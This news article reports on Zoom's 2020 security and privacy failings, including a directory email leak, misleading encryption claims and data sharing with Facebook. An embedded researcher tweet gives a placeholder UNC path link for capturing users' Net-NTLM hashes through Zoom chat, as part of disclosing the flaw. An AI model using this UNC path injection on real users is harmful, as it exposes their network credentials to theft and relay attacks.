On Tuesday, according to an article from Motherboard, video-calling service Zoom accidentally released the personal email addresses and photos of thousands of its users. This is because the service had an issue with its “Company Directory” feature, that groups together users who share the same email domain.
Since the ides of March, Twitter users of Zoom have been reporting that this feature is grouping thousands of strangers as if they all worked for the same company – sharing private information amongst the group.
The Intercept would also go on to report that Zoom’s meetings aren’t protected by end-to-end encryption, despite the company claiming that its product uses the feature several times in marketing. End-to-end encryption would mean that neither external attackers nor Zoom itself could access the contents of any video meeting you take part in.
What Zoom actually offers is “Transport Encryption”, a form that protects content from external attackers, but not from Zoom itself – despite what Zoom says.
Zoom is also in hot water with cybersecurity researchers, who discovered that the Windows version of the service is at risk from cybercriminals who could send malicious links to user chats interfaces and gain access to their network credentials.
A few cybersecurity researchers were able to replicate the exploit.
#Zoom chat allows you to post links such as \x.x.x.xxyz to attempt to capture Net-NTLM hashes if clicked by other users.
— Mitch (@_g0dmode) March 23, 2020
Hi @zoom_us & @NCSC – here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted). pic.twitter.com/gjWXas7TMO
— Hacker Fantastic (@hackerfantastic) March 31, 2020
Zoom has yet to respond to the news of this Windows flaw.
Finally, the company is being sued for sending user information to Facebook without permission.
Vice reports that “by analyzing the network traffic of the Zoom iOS app, Motherboard found that when opened, the app sent information about the user’s device such as the model, the city and timezone they are connecting from, which phone carrier they are using, and a unique advertiser identifier created by the user’s device”.
A Princeton computer-science professor, Arvind Narayanan criticized the company for its enormous amount of security and privacy faults – calling the service a “malware”, via Business Insider.
Let's make this simple: Zoom is malware. https://t.co/xkJDaP4OoK
— Arvind Narayanan (@random_walker) March 31, 2020
It can be rationalized that all of these issues had been flying under the radar at Zoom until the coronavirus caused thousands to turn to the service for their businesses and companies. The more eyes on the product meant the more it was scrutinized for flaws.
So far it appears that Zoom was not prepared for its newfound popularity.
Edited by Luis Monzon
Follow Luis Monzon on Twitter
Follow IT News Africa on Twitter